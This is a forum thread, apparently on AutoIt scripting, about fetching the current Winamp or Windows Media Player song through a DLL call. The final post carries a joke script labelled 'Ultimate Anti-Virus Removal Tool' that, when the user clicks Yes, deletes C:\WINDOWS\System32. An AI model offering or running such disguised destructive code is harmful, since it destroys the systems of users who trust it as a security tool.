Jump to content

WMP song and artist


Recommended Posts

I need Winamp for this and i have to open music file with Winamp or can i open music file with Windows Media Player too? Or svennies _MediaOpen()?

EDIT: I tried with WMP several times, but it return me always "0". Code:

$open = DllOpen("r1dll.dll")
$call = DllCall($open, "", "GetCurrentWinampSong")
MsgBox(0, "", $call)

Are you using Winamp or mIRC?

Edited by poisonkiller
Link to comment
Share on other sites

DaleHohm, i have to apologise, because your metod worked, when i asked how to register .dll-s B). But i have to say, there is a little bad thing: I cant read .wma files, but i can .mp3 files. Im working to get some way to read .wma files too, but if you know then post your way please!

Link to comment
Share on other sites

  • 2 years later...

Is there any way to change the lyrics part? I've really been looking for something to do this.

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...